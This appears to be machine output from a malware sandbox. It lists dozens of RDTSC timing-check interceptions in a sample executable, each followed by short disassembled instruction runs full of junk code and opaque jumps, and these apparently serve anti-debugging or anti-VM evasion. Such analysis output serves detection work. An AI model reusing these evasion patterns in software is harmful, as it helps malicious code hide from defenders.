Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 189A1B9 second address: 189A1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A1A97 second address: 18A1A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A1A9B second address: 18A1A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A1C05 second address: 18A1C18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A2026 second address: 18A2039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A22E4 second address: 18A22E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A22E9 second address: 18A2304 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 je 00007F9334DAF996h 0x0000000b js 00007F9334DAF996h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A2304 second address: 18A2329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F9334BA0039h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A2329 second address: 18A232F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A232F second address: 18A2372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334BA0039h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F9334BA002Ch 0x00000012 jmp 00007F9334BA0033h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A2372 second address: 18A237E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9334DAF99Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A24E2 second address: 18A24F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Eh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A24F5 second address: 18A24FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A261F second address: 18A262F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9334BA0032h 0x00000008 jo 00007F9334BA0026h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A9101 second address: 18A9105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A7F8C second address: 18A7F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1874726 second address: 187472A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1874B5B second address: 1874B62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1874B62 second address: 1874BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 4D9A814Fh 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F9334DAF998h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 jmp 00007F9334DAF9A4h 0x0000002d push 3757D9D0h 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 jne 00007F9334DAF996h 0x0000003b jmp 00007F9334DAF9A8h 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1874BC9 second address: 1874BCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1874D41 second address: 1874D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1874D47 second address: 1874D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1874D4B second address: 1874D4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1874D4F second address: 1874D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1874D5D second address: 1874DC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a xchg eax, esi 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F9334DAF998h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov dx, di 0x00000028 jmp 00007F9334DAF9A0h 0x0000002d push eax 0x0000002e pushad 0x0000002f pushad 0x00000030 jl 00007F9334DAF996h 0x00000036 jmp 00007F9334DAF9A3h 0x0000003b popad 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1874E69 second address: 1874E6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1874E6D second address: 1874E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007F9334DAF99Eh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1874E7E second address: 1874E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push esi 0x0000000a pushad 0x0000000b jmp 00007F9334BA0031h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1875119 second address: 187511D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A84C4 second address: 18A84CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A84CA second address: 18A84CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A84CE second address: 18A8509 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9334BA0026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jg 00007F9334BA0026h 0x00000015 push esi 0x00000016 pop esi 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F9334BA002Bh 0x0000001e popad 0x0000001f jmp 00007F9334BA0036h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A8509 second address: 18A8515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F9334DAF996h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A866C second address: 18A8698 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F9334BA0026h 0x00000009 jns 00007F9334BA0026h 0x0000000f jmp 00007F9334BA0039h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A8698 second address: 18A86CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F9334DAF996h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 pushad 0x00000011 jno 00007F9334DAF996h 0x00000017 jmp 00007F9334DAF9A9h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A8943 second address: 18A8962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0035h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A8962 second address: 18A8978 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18A8978 second address: 18A8984 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9334BA002Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18AEDC1 second address: 18AEDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18AEDC7 second address: 18AEDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 182D24B second address: 182D275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334DAF9A1h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9334DAF9A0h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 182D275 second address: 182D279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18ADA1A second address: 18ADA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18ADC7B second address: 18ADC86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18ADDC6 second address: 18ADDFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jno 00007F9334DAF99Ah 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 jnp 00007F9334DAF996h 0x00000018 pop edx 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jns 00007F9334DAF9A2h 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pop edx 0x00000026 je 00007F9334DAF996h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18ADDFE second address: 18ADE06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18AE4C8 second address: 18AE4D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334DAF99Ah 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18AE7A3 second address: 18AE7BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18AE7BC second address: 18AE7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18AE7C3 second address: 18AE7C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18AE7C9 second address: 18AE7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18AEC32 second address: 18AEC3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9334BA0026h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18AD5A4 second address: 18AD5B1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9334DAF998h 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B5243 second address: 18B524B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B524B second address: 18B5264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334DAF9A5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B556E second address: 18B557B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9334BA0028h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B557B second address: 18B5581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B5581 second address: 18B558D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9334BA0026h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B7D68 second address: 18B7D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9334DAF996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B7D72 second address: 18B7D7C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9334BA0026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B7D7C second address: 18B7D86 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9334DAF99Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B7D86 second address: 18B7D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B78E8 second address: 18B78EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B78EC second address: 18B7914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334BA0038h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jnc 00007F9334BA0026h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B7914 second address: 18B791E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9334DAF996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B791E second address: 18B7938 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0034h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B7938 second address: 18B7942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F9334DAF996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18BC5F5 second address: 18BC5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18BC5FB second address: 18BC5FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18BCA6D second address: 18BCA83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9334BA0030h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18BCA83 second address: 18BCA8D instructions: 0x00000000 rdtsc 0x00000002 je 00007F9334DAF99Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18C2D64 second address: 18C2D78 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9334BA0026h 0x00000008 jns 00007F9334BA0026h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18C1620 second address: 18C162C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9334DAF996h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 187533F second address: 1875343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1875343 second address: 1875384 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop esi 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F9334DAF998h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push 00000004h 0x0000002a xor dword ptr [ebp+12A21829h], edx 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F9334DAF99Bh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1875384 second address: 187538E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F9334BA0026h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18C2A0D second address: 18C2A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18C2A15 second address: 18C2A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18C5F5D second address: 18C5F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18C5F63 second address: 18C5F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18C5F67 second address: 18C5F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18C5796 second address: 18C57A0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9334BA0026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CD263 second address: 18CD272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jl 00007F9334DAF996h 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CD272 second address: 18CD278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CD278 second address: 18CD280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CD280 second address: 18CD286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CE01B second address: 18CE01F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CE2C7 second address: 18CE2D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CE58E second address: 18CE592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CE592 second address: 18CE5A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F9334BA0026h 0x0000000e jne 00007F9334BA0026h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CE5A6 second address: 18CE5AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CE5AA second address: 18CE5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CE5B0 second address: 18CE5B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CEB70 second address: 18CEB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334BA002Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CEB82 second address: 18CEB86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
